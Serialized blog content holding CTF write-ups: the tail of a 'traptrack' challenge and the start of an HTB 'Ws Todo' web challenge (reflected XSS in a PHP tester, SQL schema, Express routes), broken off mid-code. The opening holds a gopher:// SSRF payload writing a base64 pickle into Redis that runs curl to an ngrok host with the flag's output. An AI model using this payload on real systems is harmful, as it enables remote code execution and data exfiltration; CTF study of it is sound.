session=8e3c330d-3f69-475a-9924-9638f040b30e\n\n{\"trapName\":\"hello\",\"trapURL\":\"gopher://127.0.0.1:6379/_%0D%0AHSET%20jobs%20101%20gASVWgAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjD9jdXJsICJodHRwOi8vYjUzNi05MS02OS0xMzMtMjE0Lm5ncm9rLmlvLyIkKC9yZWFkZmxhZyB8IGJhc2U2NCmUhZRSlC4=%0D%0AHGET%20jobs%20101%0D%0Aquit%0D%0A\"}\n",[45353],{"type":33,"tag":105,"props":45354,"children":45355},{"__ignoreMap":8},[45356],{"type":38,"value":45351},{"type":33,"tag":47,"props":45358,"children":45359},{},[45360,45362,45368],{"type":38,"value":45361},"And then we just have to visit this URL: 
",{"type":33,"tag":53,"props":45363,"children":45366},{"href":45364,"rel":45365},"http://localhost:1337/api/tracks/101/status",[57],[45367],{"type":38,"value":45364},{"type":38,"value":45369}," to get the result on our Ngrok.",{"type":33,"tag":32400,"props":45371,"children":45373},{"width":40587,"src":45372},"https://user-images.githubusercontent.com/28403617/227367481-54f89c35-60da-44be-adfe-de5f12d5ae52.png",[],{"type":33,"tag":5227,"props":45375,"children":45376},{},[45377],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":45379},[45380,45381,45382,45383,45384],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":43499,"depth":362,"text":43502},{"id":43976,"depth":362,"text":43979},{"id":44770,"depth":362,"text":44773},"content:writeups:traptrack.md","writeups/traptrack.md","writeups/traptrack",{"_path":45389,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":45390,"description":8,"head":45391,"body":45407,"_type":5240,"_id":52779,"_source":5242,"_file":52780,"_stem":52781,"_extension":5245},"/writeups/ws-todo","Ws Todo",{"title":45390,"description":45392,"keywords":45393,"slug":45394,"image":45395,"date":45396,"meta":45397},"Ws todo is a medium web challenge from htb. 
This challenge is about websockets and xss.","web,websockets,xss,puppeteer","ws-todo","https://res.cloudinary.com/dmju5zuhr/image/upload/v1743778294/writeups/htb.webp","2022-12-26",[45398,45399,45401,45402,45403,45405],{"og:description":45392},{"og:title":45400},"Ws todo writeup",{"og:image":45395},{"description":45392},{"title":45404},"Ws Todo writeup",{"keywords":45406},"web,websockets,xss,puppeteer,htb,ctf",{"type":30,"children":45408,"toc":52771},[45409,45413,45417,45437,45457,45463,45482,45977,45996,46002,46014,46027,46341,46346,47325,47343,47356,48723,48734,48740,48753,50928,50969,51340,51351,51362,51403,51414,51420,51425,51547,51559,51564,51575,51580,51591,51713,51756,51761,51920,51924,51943,52455,52460,52586,52598,52610,52762,52767],{"type":33,"tag":34,"props":45410,"children":45411},{"id":45394},[45412],{"type":38,"value":45390},{"type":33,"tag":40,"props":45414,"children":45415},{"id":42},[45416],{"type":38,"value":45},{"type":33,"tag":47,"props":45418,"children":45419},{},[45420,45422,45428,45430,45436],{"type":38,"value":45421},"Ws Todo is an medium web challenge from HTB.\nThere are two webs apps running on the machine, one is a ",{"type":33,"tag":105,"props":45423,"children":45425},{"className":45424},[],[45426],{"type":38,"value":45427},"todo app",{"type":38,"value":45429}," and the other is a ",{"type":33,"tag":105,"props":45431,"children":45433},{"className":45432},[],[45434],{"type":38,"value":45435},"html tester",{"type":38,"value":215},{"type":33,"tag":47,"props":45438,"children":45439},{},[45440,45442,45448,45450,45456],{"type":38,"value":45441},"The flag is in the todo element of the todo app. But it protected and we need to have ",{"type":33,"tag":105,"props":45443,"children":45445},{"className":45444},[],[45446],{"type":38,"value":45447},"userId == 1",{"type":38,"value":45449}," to access it. 
Furthermore, the content of a todo is encryted with a ",{"type":33,"tag":105,"props":45451,"children":45453},{"className":45452},[],[45454],{"type":38,"value":45455},"secret key",{"type":38,"value":215},{"type":33,"tag":81,"props":45458,"children":45460},{"id":45459},"html-tester",[45461],{"type":38,"value":45462},"HTML Tester",{"type":33,"tag":47,"props":45464,"children":45465},{},[45466,45468,45473,45475,45480],{"type":38,"value":45467},"The HTML tester is a simple php file, that is get a parameter ",{"type":33,"tag":105,"props":45469,"children":45471},{"className":45470},[],[45472],{"type":38,"value":5929},{"type":38,"value":45474}," from url and display it inside a ",{"type":33,"tag":105,"props":45476,"children":45478},{"className":45477},[],[45479],{"type":38,"value":8671},{"type":38,"value":45481}," statement.",{"type":33,"tag":114,"props":45483,"children":45484},{"lang":40629},[45485],{"type":33,"tag":119,"props":45486,"children":45488},{"code":45487,"language":40629,"meta":8,"className":40634,"style":8},"\u003Chtml>\n    \u003Cbody>\n        \u003C?php if (isset($_GET['html'])): ?>\n            \u003C?php echo $_GET['html']; ?>\n        \u003C?php else: ?>\n            \u003Ch1>HTML Tester\u003C/h1>\n            \u003Cp>Internal development tool\u003C/p>\n            \u003Cform action=\"index.php\" method=\"get\">\n                \u003Cinput type=\"text\" name=\"html\" />\n                \u003Cinput type=\"submit\" value=\"Submit\" />\n            \u003C/form>\n        \u003C?php endif; ?>\n    
\u003C/body>\n\u003C/html>\n",[45489],{"type":33,"tag":105,"props":45490,"children":45491},{"__ignoreMap":8},[45492,45507,45522,45586,45636,45659,45697,45739,45795,45851,45907,45923,45947,45962],{"type":33,"tag":128,"props":45493,"children":45494},{"class":130,"line":131},[45495,45499,45503],{"type":33,"tag":128,"props":45496,"children":45497},{"style":300},[45498],{"type":38,"value":5977},{"type":33,"tag":128,"props":45500,"children":45501},{"style":151},[45502],{"type":38,"value":5929},{"type":33,"tag":128,"props":45504,"children":45505},{"style":300},[45506],{"type":38,"value":6097},{"type":33,"tag":128,"props":45508,"children":45509},{"class":130,"line":362},[45510,45514,45518],{"type":33,"tag":128,"props":45511,"children":45512},{"style":300},[45513],{"type":38,"value":6105},{"type":33,"tag":128,"props":45515,"children":45516},{"style":151},[45517],{"type":38,"value":5671},{"type":33,"tag":128,"props":45519,"children":45520},{"style":300},[45521],{"type":38,"value":6097},{"type":33,"tag":128,"props":45523,"children":45524},{"class":130,"line":403},[45525,45530,45534,45538,45542,45547,45551,45556,45560,45564,45568,45572,45577,45581],{"type":33,"tag":128,"props":45526,"children":45527},{"style":300},[45528],{"type":38,"value":45529},"        
\u003C?",{"type":33,"tag":128,"props":45531,"children":45532},{"style":151},[45533],{"type":38,"value":40629},{"type":33,"tag":128,"props":45535,"children":45536},{"style":1576},[45537],{"type":38,"value":14274},{"type":33,"tag":128,"props":45539,"children":45540},{"style":312},[45541],{"type":38,"value":2852},{"type":33,"tag":128,"props":45543,"children":45544},{"style":437},[45545],{"type":38,"value":45546},"isset",{"type":33,"tag":128,"props":45548,"children":45549},{"style":312},[45550],{"type":38,"value":40659},{"type":33,"tag":128,"props":45552,"children":45553},{"style":306},[45554],{"type":38,"value":45555},"_GET",{"type":33,"tag":128,"props":45557,"children":45558},{"style":312},[45559],{"type":38,"value":344},{"type":33,"tag":128,"props":45561,"children":45562},{"style":676},[45563],{"type":38,"value":6040},{"type":33,"tag":128,"props":45565,"children":45566},{"style":140},[45567],{"type":38,"value":5929},{"type":33,"tag":128,"props":45569,"children":45570},{"style":676},[45571],{"type":38,"value":6040},{"type":33,"tag":128,"props":45573,"children":45574},{"style":312},[45575],{"type":38,"value":45576},"]))",{"type":33,"tag":128,"props":45578,"children":45579},{"style":300},[45580],{"type":38,"value":284},{"type":33,"tag":128,"props":45582,"children":45583},{"style":300},[45584],{"type":38,"value":45585}," ?>\n",{"type":33,"tag":128,"props":45587,"children":45588},{"class":130,"line":739},[45589,45594,45598,45603,45607,45611,45615,45619,45623,45627,45632],{"type":33,"tag":128,"props":45590,"children":45591},{"style":300},[45592],{"type":38,"value":45593},"            \u003C?",{"type":33,"tag":128,"props":45595,"children":45596},{"style":151},[45597],{"type":38,"value":40629},{"type":33,"tag":128,"props":45599,"children":45600},{"style":437},[45601],{"type":38,"value":45602}," 
echo",{"type":33,"tag":128,"props":45604,"children":45605},{"style":312},[45606],{"type":38,"value":40686},{"type":33,"tag":128,"props":45608,"children":45609},{"style":306},[45610],{"type":38,"value":45555},{"type":33,"tag":128,"props":45612,"children":45613},{"style":312},[45614],{"type":38,"value":344},{"type":33,"tag":128,"props":45616,"children":45617},{"style":676},[45618],{"type":38,"value":6040},{"type":33,"tag":128,"props":45620,"children":45621},{"style":140},[45622],{"type":38,"value":5929},{"type":33,"tag":128,"props":45624,"children":45625},{"style":676},[45626],{"type":38,"value":6040},{"type":33,"tag":128,"props":45628,"children":45629},{"style":312},[45630],{"type":38,"value":45631},"];",{"type":33,"tag":128,"props":45633,"children":45634},{"style":300},[45635],{"type":38,"value":45585},{"type":33,"tag":128,"props":45637,"children":45638},{"class":130,"line":765},[45639,45643,45647,45651,45655],{"type":33,"tag":128,"props":45640,"children":45641},{"style":300},[45642],{"type":38,"value":45529},{"type":33,"tag":128,"props":45644,"children":45645},{"style":151},[45646],{"type":38,"value":40629},{"type":33,"tag":128,"props":45648,"children":45649},{"style":1576},[45650],{"type":38,"value":14269},{"type":33,"tag":128,"props":45652,"children":45653},{"style":300},[45654],{"type":38,"value":284},{"type":33,"tag":128,"props":45656,"children":45657},{"style":300},[45658],{"type":38,"value":45585},{"type":33,"tag":128,"props":45660,"children":45661},{"class":130,"line":804},[45662,45667,45671,45675,45680,45685,45689,45693],{"type":33,"tag":128,"props":45663,"children":45664},{"style":300},[45665],{"type":38,"value":45666},"            
\u003C",{"type":33,"tag":128,"props":45668,"children":45669},{"style":151},[45670],{"type":38,"value":34},{"type":33,"tag":128,"props":45672,"children":45673},{"style":300},[45674],{"type":38,"value":6054},{"type":33,"tag":128,"props":45676,"children":45677},{"style":151},[45678],{"type":38,"value":45679},"HTML",{"type":33,"tag":128,"props":45681,"children":45682},{"style":151},[45683],{"type":38,"value":45684}," Tester",{"type":33,"tag":128,"props":45686,"children":45687},{"style":300},[45688],{"type":38,"value":6190},{"type":33,"tag":128,"props":45690,"children":45691},{"style":151},[45692],{"type":38,"value":34},{"type":33,"tag":128,"props":45694,"children":45695},{"style":300},[45696],{"type":38,"value":6097},{"type":33,"tag":128,"props":45698,"children":45699},{"class":130,"line":839},[45700,45704,45708,45712,45717,45722,45727,45731,45735],{"type":33,"tag":128,"props":45701,"children":45702},{"style":300},[45703],{"type":38,"value":45666},{"type":33,"tag":128,"props":45705,"children":45706},{"style":151},[45707],{"type":38,"value":47},{"type":33,"tag":128,"props":45709,"children":45710},{"style":300},[45711],{"type":38,"value":6054},{"type":33,"tag":128,"props":45713,"children":45714},{"style":151},[45715],{"type":38,"value":45716},"Internal",{"type":33,"tag":128,"props":45718,"children":45719},{"style":151},[45720],{"type":38,"value":45721}," development",{"type":33,"tag":128,"props":45723,"children":45724},{"style":151},[45725],{"type":38,"value":45726}," 
tool",{"type":33,"tag":128,"props":45728,"children":45729},{"style":300},[45730],{"type":38,"value":6190},{"type":33,"tag":128,"props":45732,"children":45733},{"style":151},[45734],{"type":38,"value":47},{"type":33,"tag":128,"props":45736,"children":45737},{"style":300},[45738],{"type":38,"value":6097},{"type":33,"tag":128,"props":45740,"children":45741},{"class":130,"line":848},[45742,45746,45750,45754,45758,45762,45767,45771,45775,45779,45783,45787,45791],{"type":33,"tag":128,"props":45743,"children":45744},{"style":300},[45745],{"type":38,"value":45666},{"type":33,"tag":128,"props":45747,"children":45748},{"style":151},[45749],{"type":38,"value":14844},{"type":33,"tag":128,"props":45751,"children":45752},{"style":151},[45753],{"type":38,"value":14849},{"type":33,"tag":128,"props":45755,"children":45756},{"style":312},[45757],{"type":38,"value":315},{"type":33,"tag":128,"props":45759,"children":45760},{"style":676},[45761],{"type":38,"value":669},{"type":33,"tag":128,"props":45763,"children":45764},{"style":140},[45765],{"type":38,"value":45766},"index.php",{"type":33,"tag":128,"props":45768,"children":45769},{"style":676},[45770],{"type":38,"value":669},{"type":33,"tag":128,"props":45772,"children":45773},{"style":151},[45774],{"type":38,"value":24416},{"type":33,"tag":128,"props":45776,"children":45777},{"style":312},[45778],{"type":38,"value":315},{"type":33,"tag":128,"props":45780,"children":45781},{"style":676},[45782],{"type":38,"value":669},{"type":33,"tag":128,"props":45784,"children":45785},{"style":140},[45786],{"type":38,"value":13526},{"type":33,"tag":128,"props":45788,"children":45789},{"style":676},[45790],{"type":38,"value":669},{"type":33,"tag":128,"props":45792,"children":45793},{"style":300},[45794],{"type":38,"value":6097},{"type":33,"tag":128,"props":45796,"children":45797},{"class":130,"line":976},[45798,45803,45807,45811,45815,45819,45823,45827,45831,45835,45839,45843,45847],{"type":33,"tag":128,"props":45799,"children":45800},{"style":300},[
45801],{"type":38,"value":45802},"                \u003C",{"type":33,"tag":128,"props":45804,"children":45805},{"style":151},[45806],{"type":38,"value":14882},{"type":33,"tag":128,"props":45808,"children":45809},{"style":151},[45810],{"type":38,"value":14887},{"type":33,"tag":128,"props":45812,"children":45813},{"style":312},[45814],{"type":38,"value":315},{"type":33,"tag":128,"props":45816,"children":45817},{"style":676},[45818],{"type":38,"value":669},{"type":33,"tag":128,"props":45820,"children":45821},{"style":140},[45822],{"type":38,"value":38},{"type":33,"tag":128,"props":45824,"children":45825},{"style":676},[45826],{"type":38,"value":669},{"type":33,"tag":128,"props":45828,"children":45829},{"style":151},[45830],{"type":38,"value":14688},{"type":33,"tag":128,"props":45832,"children":45833},{"style":312},[45834],{"type":38,"value":315},{"type":33,"tag":128,"props":45836,"children":45837},{"style":676},[45838],{"type":38,"value":669},{"type":33,"tag":128,"props":45840,"children":45841},{"style":140},[45842],{"type":38,"value":5929},{"type":33,"tag":128,"props":45844,"children":45845},{"style":676},[45846],{"type":38,"value":669},{"type":33,"tag":128,"props":45848,"children":45849},{"style":300},[45850],{"type":38,"value":24514},{"type":33,"tag":128,"props":45852,"children":45853},{"class":130,"line":988},[45854,45858,45862,45866,45870,45874,45878,45882,45886,45890,45894,45899,45903],{"type":33,"tag":128,"props":45855,"children":45856},{"style":300},[45857],{"type":38,"value":45802},{"type":33,"tag":128,"props":45859,"children":45860},{"style":151},[45861],{"type":38,"value":14882},{"type":33,"tag":128,"props":45863,"children":45864},{"style":151},[45865],{"type":38,"value":14887},{"type":33,"tag":128,"props":45867,"children":45868},{"style":312},[45869],{"type":38,"value":315},{"type":33,"tag":128,"props":45871,"children":45872},{"style":676},[45873],{"type":38,"value":669},{"type":33,"tag":128,"props":45875,"children":45876},{"style":140},[45877],{"type":38,"
value":14977},{"type":33,"tag":128,"props":45879,"children":45880},{"style":676},[45881],{"type":38,"value":669},{"type":33,"tag":128,"props":45883,"children":45884},{"style":151},[45885],{"type":38,"value":13031},{"type":33,"tag":128,"props":45887,"children":45888},{"style":312},[45889],{"type":38,"value":315},{"type":33,"tag":128,"props":45891,"children":45892},{"style":676},[45893],{"type":38,"value":669},{"type":33,"tag":128,"props":45895,"children":45896},{"style":140},[45897],{"type":38,"value":45898},"Submit",{"type":33,"tag":128,"props":45900,"children":45901},{"style":676},[45902],{"type":38,"value":669},{"type":33,"tag":128,"props":45904,"children":45905},{"style":300},[45906],{"type":38,"value":24514},{"type":33,"tag":128,"props":45908,"children":45909},{"class":130,"line":1001},[45910,45915,45919],{"type":33,"tag":128,"props":45911,"children":45912},{"style":300},[45913],{"type":38,"value":45914},"            \u003C/",{"type":33,"tag":128,"props":45916,"children":45917},{"style":151},[45918],{"type":38,"value":14844},{"type":33,"tag":128,"props":45920,"children":45921},{"style":300},[45922],{"type":38,"value":6097},{"type":33,"tag":128,"props":45924,"children":45925},{"class":130,"line":1014},[45926,45930,45934,45939,45943],{"type":33,"tag":128,"props":45927,"children":45928},{"style":300},[45929],{"type":38,"value":45529},{"type":33,"tag":128,"props":45931,"children":45932},{"style":151},[45933],{"type":38,"value":40629},{"type":33,"tag":128,"props":45935,"children":45936},{"style":1576},[45937],{"type":38,"value":45938}," 
endif",{"type":33,"tag":128,"props":45940,"children":45941},{"style":312},[45942],{"type":38,"value":35231},{"type":33,"tag":128,"props":45944,"children":45945},{"style":300},[45946],{"type":38,"value":45585},{"type":33,"tag":128,"props":45948,"children":45949},{"class":130,"line":1026},[45950,45954,45958],{"type":33,"tag":128,"props":45951,"children":45952},{"style":300},[45953],{"type":38,"value":14993},{"type":33,"tag":128,"props":45955,"children":45956},{"style":151},[45957],{"type":38,"value":5671},{"type":33,"tag":128,"props":45959,"children":45960},{"style":300},[45961],{"type":38,"value":6097},{"type":33,"tag":128,"props":45963,"children":45964},{"class":130,"line":1038},[45965,45969,45973],{"type":33,"tag":128,"props":45966,"children":45967},{"style":300},[45968],{"type":38,"value":6190},{"type":33,"tag":128,"props":45970,"children":45971},{"style":151},[45972],{"type":38,"value":5929},{"type":33,"tag":128,"props":45974,"children":45975},{"style":300},[45976],{"type":38,"value":6097},{"type":33,"tag":47,"props":45978,"children":45979},{},[45980,45982,45987,45989,45994],{"type":38,"value":45981},"This is really simple to see that service have a ",{"type":33,"tag":105,"props":45983,"children":45985},{"className":45984},[],[45986],{"type":38,"value":20074},{"type":38,"value":45988}," vulnerability. We can inject a ",{"type":33,"tag":105,"props":45990,"children":45992},{"className":45991},[],[45993],{"type":38,"value":15064},{"type":38,"value":45995}," in GET parameters.",{"type":33,"tag":81,"props":45997,"children":45999},{"id":45998},"todo-app-main-service",[46000],{"type":38,"value":46001},"Todo App (main service)",{"type":33,"tag":47,"props":46003,"children":46004},{},[46005,46007,46012],{"type":38,"value":46006},"The Todo app is a express app with a mysql database. When you have an account you can create a todo and add some content. 
The content is encrypted with a ",{"type":33,"tag":105,"props":46008,"children":46010},{"className":46009},[],[46011],{"type":38,"value":45455},{"type":38,"value":46013}," that is stored in the database.",{"type":33,"tag":47,"props":46015,"children":46016},{},[46017,46019,46025],{"type":38,"value":46018},"There is definitions of the database in ",{"type":33,"tag":105,"props":46020,"children":46022},{"className":46021},[],[46023],{"type":38,"value":46024},"db.sql",{"type":38,"value":46026}," file:",{"type":33,"tag":114,"props":46028,"children":46029},{"lang":10492},[46030],{"type":33,"tag":119,"props":46031,"children":46033},{"code":46032,"language":10492,"meta":8,"className":41205,"style":8},"CREATE TABLE users (\n    id INT NOT NULL AUTO_INCREMENT,\n    username VARCHAR(255) NOT NULL,\n    password VARCHAR(255) NOT NULL,\n    secret VARCHAR(255) NOT NULL,\n    PRIMARY KEY (id)\n);\n\nCREATE TABLE todos (\n    id INT NOT NULL AUTO_INCREMENT,\n    user_id INT NOT NULL,\n    data VARCHAR(255) NOT NULL,\n    PRIMARY KEY (id),\n    FOREIGN KEY (user_id) REFERENCES users(id)\n);\n",[46034],{"type":33,"tag":105,"props":46035,"children":46036},{"__ignoreMap":8},[46037,46059,46082,46116,46149,46181,46194,46201,46208,46228,46247,46267,46299,46311,46334],{"type":33,"tag":128,"props":46038,"children":46039},{"class":130,"line":131},[46040,46045,46050,46055],{"type":33,"tag":128,"props":46041,"children":46042},{"style":1576},[46043],{"type":38,"value":46044},"CREATE",{"type":33,"tag":128,"props":46046,"children":46047},{"style":1576},[46048],{"type":38,"value":46049}," TABLE",{"type":33,"tag":128,"props":46051,"children":46052},{"style":135},[46053],{"type":38,"value":46054}," 
users",{"type":33,"tag":128,"props":46056,"children":46057},{"style":323},[46058],{"type":38,"value":41261},{"type":33,"tag":128,"props":46060,"children":46061},{"class":130,"line":362},[46062,46067,46072,46077],{"type":33,"tag":128,"props":46063,"children":46064},{"style":323},[46065],{"type":38,"value":46066},"    id ",{"type":33,"tag":128,"props":46068,"children":46069},{"style":300},[46070],{"type":38,"value":46071},"INT",{"type":33,"tag":128,"props":46073,"children":46074},{"style":1576},[46075],{"type":38,"value":46076}," NOT NULL",{"type":33,"tag":128,"props":46078,"children":46079},{"style":323},[46080],{"type":38,"value":46081}," AUTO_INCREMENT,\n",{"type":33,"tag":128,"props":46083,"children":46084},{"class":130,"line":403},[46085,46089,46094,46098,46103,46107,46112],{"type":33,"tag":128,"props":46086,"children":46087},{"style":323},[46088],{"type":38,"value":30509},{"type":33,"tag":128,"props":46090,"children":46091},{"style":300},[46092],{"type":38,"value":46093},"VARCHAR",{"type":33,"tag":128,"props":46095,"children":46096},{"style":323},[46097],{"type":38,"value":5566},{"type":33,"tag":128,"props":46099,"children":46100},{"style":523},[46101],{"type":38,"value":46102},"255",{"type":33,"tag":128,"props":46104,"children":46105},{"style":323},[46106],{"type":38,"value":10105},{"type":33,"tag":128,"props":46108,"children":46109},{"style":1576},[46110],{"type":38,"value":46111},"NOT NULL",{"type":33,"tag":128,"props":46113,"children":46114},{"style":323},[46115],{"type":38,"value":693},{"type":33,"tag":128,"props":46117,"children":46118},{"class":130,"line":739},[46119,46124,46129,46133,46137,46141,46145],{"type":33,"tag":128,"props":46120,"children":46121},{"style":1576},[46122],{"type":38,"value":46123},"    password",{"type":33,"tag":128,"props":46125,"children":46126},{"style":300},[46127],{"type":38,"value":46128}," 
VARCHAR",{"type":33,"tag":128,"props":46130,"children":46131},{"style":323},[46132],{"type":38,"value":5566},{"type":33,"tag":128,"props":46134,"children":46135},{"style":523},[46136],{"type":38,"value":46102},{"type":33,"tag":128,"props":46138,"children":46139},{"style":323},[46140],{"type":38,"value":10105},{"type":33,"tag":128,"props":46142,"children":46143},{"style":1576},[46144],{"type":38,"value":46111},{"type":33,"tag":128,"props":46146,"children":46147},{"style":323},[46148],{"type":38,"value":693},{"type":33,"tag":128,"props":46150,"children":46151},{"class":130,"line":765},[46152,46157,46161,46165,46169,46173,46177],{"type":33,"tag":128,"props":46153,"children":46154},{"style":1576},[46155],{"type":38,"value":46156},"    secret",{"type":33,"tag":128,"props":46158,"children":46159},{"style":300},[46160],{"type":38,"value":46128},{"type":33,"tag":128,"props":46162,"children":46163},{"style":323},[46164],{"type":38,"value":5566},{"type":33,"tag":128,"props":46166,"children":46167},{"style":523},[46168],{"type":38,"value":46102},{"type":33,"tag":128,"props":46170,"children":46171},{"style":323},[46172],{"type":38,"value":10105},{"type":33,"tag":128,"props":46174,"children":46175},{"style":1576},[46176],{"type":38,"value":46111},{"type":33,"tag":128,"props":46178,"children":46179},{"style":323},[46180],{"type":38,"value":693},{"type":33,"tag":128,"props":46182,"children":46183},{"class":130,"line":804},[46184,46189],{"type":33,"tag":128,"props":46185,"children":46186},{"style":300},[46187],{"type":38,"value":46188},"    PRIMARY KEY",{"type":33,"tag":128,"props":46190,"children":46191},{"style":323},[46192],{"type":38,"value":46193}," 
(id)\n",{"type":33,"tag":128,"props":46195,"children":46196},{"class":130,"line":839},[46197],{"type":33,"tag":128,"props":46198,"children":46199},{"style":323},[46200],{"type":38,"value":5815},{"type":33,"tag":128,"props":46202,"children":46203},{"class":130,"line":848},[46204],{"type":33,"tag":128,"props":46205,"children":46206},{"emptyLinePlaceholder":896},[46207],{"type":38,"value":899},{"type":33,"tag":128,"props":46209,"children":46210},{"class":130,"line":976},[46211,46215,46219,46224],{"type":33,"tag":128,"props":46212,"children":46213},{"style":1576},[46214],{"type":38,"value":46044},{"type":33,"tag":128,"props":46216,"children":46217},{"style":1576},[46218],{"type":38,"value":46049},{"type":33,"tag":128,"props":46220,"children":46221},{"style":135},[46222],{"type":38,"value":46223}," todos",{"type":33,"tag":128,"props":46225,"children":46226},{"style":323},[46227],{"type":38,"value":41261},{"type":33,"tag":128,"props":46229,"children":46230},{"class":130,"line":988},[46231,46235,46239,46243],{"type":33,"tag":128,"props":46232,"children":46233},{"style":323},[46234],{"type":38,"value":46066},{"type":33,"tag":128,"props":46236,"children":46237},{"style":300},[46238],{"type":38,"value":46071},{"type":33,"tag":128,"props":46240,"children":46241},{"style":1576},[46242],{"type":38,"value":46076},{"type":33,"tag":128,"props":46244,"children":46245},{"style":323},[46246],{"type":38,"value":46081},{"type":33,"tag":128,"props":46248,"children":46249},{"class":130,"line":1001},[46250,46255,46259,46263],{"type":33,"tag":128,"props":46251,"children":46252},{"style":323},[46253],{"type":38,"value":46254},"    user_id 
",{"type":33,"tag":128,"props":46256,"children":46257},{"style":300},[46258],{"type":38,"value":46071},{"type":33,"tag":128,"props":46260,"children":46261},{"style":1576},[46262],{"type":38,"value":46076},{"type":33,"tag":128,"props":46264,"children":46265},{"style":323},[46266],{"type":38,"value":693},{"type":33,"tag":128,"props":46268,"children":46269},{"class":130,"line":1014},[46270,46275,46279,46283,46287,46291,46295],{"type":33,"tag":128,"props":46271,"children":46272},{"style":1576},[46273],{"type":38,"value":46274},"    data",{"type":33,"tag":128,"props":46276,"children":46277},{"style":300},[46278],{"type":38,"value":46128},{"type":33,"tag":128,"props":46280,"children":46281},{"style":323},[46282],{"type":38,"value":5566},{"type":33,"tag":128,"props":46284,"children":46285},{"style":523},[46286],{"type":38,"value":46102},{"type":33,"tag":128,"props":46288,"children":46289},{"style":323},[46290],{"type":38,"value":10105},{"type":33,"tag":128,"props":46292,"children":46293},{"style":1576},[46294],{"type":38,"value":46111},{"type":33,"tag":128,"props":46296,"children":46297},{"style":323},[46298],{"type":38,"value":693},{"type":33,"tag":128,"props":46300,"children":46301},{"class":130,"line":1026},[46302,46306],{"type":33,"tag":128,"props":46303,"children":46304},{"style":300},[46305],{"type":38,"value":46188},{"type":33,"tag":128,"props":46307,"children":46308},{"style":323},[46309],{"type":38,"value":46310}," (id),\n",{"type":33,"tag":128,"props":46312,"children":46313},{"class":130,"line":1038},[46314,46319,46324,46329],{"type":33,"tag":128,"props":46315,"children":46316},{"style":300},[46317],{"type":38,"value":46318},"    FOREIGN KEY",{"type":33,"tag":128,"props":46320,"children":46321},{"style":323},[46322],{"type":38,"value":46323}," (user_id) 
",{"type":33,"tag":128,"props":46325,"children":46326},{"style":300},[46327],{"type":38,"value":46328},"REFERENCES",{"type":33,"tag":128,"props":46330,"children":46331},{"style":323},[46332],{"type":38,"value":46333}," users(id)\n",{"type":33,"tag":128,"props":46335,"children":46336},{"class":130,"line":1051},[46337],{"type":33,"tag":128,"props":46338,"children":46339},{"style":323},[46340],{"type":38,"value":5815},{"type":33,"tag":47,"props":46342,"children":46343},{},[46344],{"type":38,"value":46345},"The todo app have many routes but the most important are:",{"type":33,"tag":114,"props":46347,"children":46349},{":lang:js":46348,"lang:js":8},"true",[46350],{"type":33,"tag":119,"props":46351,"children":46353},{"code":46352,"language":5526,"meta":8,"className":5530,"style":8},"router.get('/secret', async (req, res) => {\n    console.log(\"/secret\", req.session.userId)\n    const result = await db.getSecret(req.session.userId);\n    if (result) {\n        return res.status(200).json({ secret: result });\n    }\n    return res.status(400).json({ error: 'No secret found' });\n});\n\nrouter.post('/decrypt', async (req, res) => {\n    if (!req.body.secret) {\n        return res.status(400).json({ error: 'Missing secret' });\n    }\n\n    if (!req.body.cipher) {\n        return res.status(400).json({ error: 'Missing cipher' });\n    }\n\n    try {\n        const result = decrypt(req.body.cipher, req.body.secret);\n        return res.status(200).json({ decrypted: result });\n    } catch (e) {\n        return res.status(400).json({ error: 'Invalid key or cipher' });\n    }\n});\n\n// Report any suspicious activity to the admin!\nrouter.post('/report', 
doReportHandler);\n",[46354],{"type":33,"tag":105,"props":46355,"children":46356},{"__ignoreMap":8},[46357,46425,46484,46545,46568,46624,46631,46695,46702,46709,46777,46821,46885,46892,46899,46943,47007,47014,47021,47032,47104,47160,47187,47251,47258,47265,47272,47280],{"type":33,"tag":128,"props":46358,"children":46359},{"class":130,"line":131},[46360,46364,46368,46372,46376,46380,46385,46389,46393,46397,46401,46405,46409,46413,46417,46421],{"type":33,"tag":128,"props":46361,"children":46362},{"style":306},[46363],{"type":38,"value":5552},{"type":33,"tag":128,"props":46365,"children":46366},{"style":312},[46367],{"type":38,"value":215},{"type":33,"tag":128,"props":46369,"children":46370},{"style":135},[46371],{"type":38,"value":13526},{"type":33,"tag":128,"props":46373,"children":46374},{"style":312},[46375],{"type":38,"value":5566},{"type":33,"tag":128,"props":46377,"children":46378},{"style":676},[46379],{"type":38,"value":6040},{"type":33,"tag":128,"props":46381,"children":46382},{"style":140},[46383],{"type":38,"value":46384},"/secret",{"type":33,"tag":128,"props":46386,"children":46387},{"style":676},[46388],{"type":38,"value":6040},{"type":33,"tag":128,"props":46390,"children":46391},{"style":312},[46392],{"type":38,"value":5584},{"type":33,"tag":128,"props":46394,"children":46395},{"style":300},[46396],{"type":38,"value":5598},{"type":33,"tag":128,"props":46398,"children":46399},{"style":312},[46400],{"type":38,"value":2852},{"type":33,"tag":128,"props":46402,"children":46403},{"style":306},[46404],{"type":38,"value":5607},{"type":33,"tag":128,"props":46406,"children":46407},{"style":312},[46408],{"type":38,"value":5584},{"type":33,"tag":128,"props":46410,"children":46411},{"style":306},[46412],{"type":38,"value":5616},{"type":33,"tag":128,"props":46414,"children":46415},{"style":312},[46416],{"type":38,"value":2966},{"type":33,"tag":128,"props":46418,"children":46419},{"style":312},[46420],{"type":38,"value":5625},{"type":33,"tag":128,"props":46422,"childre
n":46423},{"style":312},[46424],{"type":38,"value":762},{"type":33,"tag":128,"props":46426,"children":46427},{"class":130,"line":362},[46428,46432,46436,46440,46444,46448,46452,46456,46460,46464,46468,46472,46476,46480],{"type":33,"tag":128,"props":46429,"children":46430},{"style":306},[46431],{"type":38,"value":6880},{"type":33,"tag":128,"props":46433,"children":46434},{"style":312},[46435],{"type":38,"value":215},{"type":33,"tag":128,"props":46437,"children":46438},{"style":135},[46439],{"type":38,"value":13157},{"type":33,"tag":128,"props":46441,"children":46442},{"style":312},[46443],{"type":38,"value":5566},{"type":33,"tag":128,"props":46445,"children":46446},{"style":676},[46447],{"type":38,"value":669},{"type":33,"tag":128,"props":46449,"children":46450},{"style":140},[46451],{"type":38,"value":46384},{"type":33,"tag":128,"props":46453,"children":46454},{"style":676},[46455],{"type":38,"value":669},{"type":33,"tag":128,"props":46457,"children":46458},{"style":312},[46459],{"type":38,"value":5584},{"type":33,"tag":128,"props":46461,"children":46462},{"style":306},[46463],{"type":38,"value":5662},{"type":33,"tag":128,"props":46465,"children":464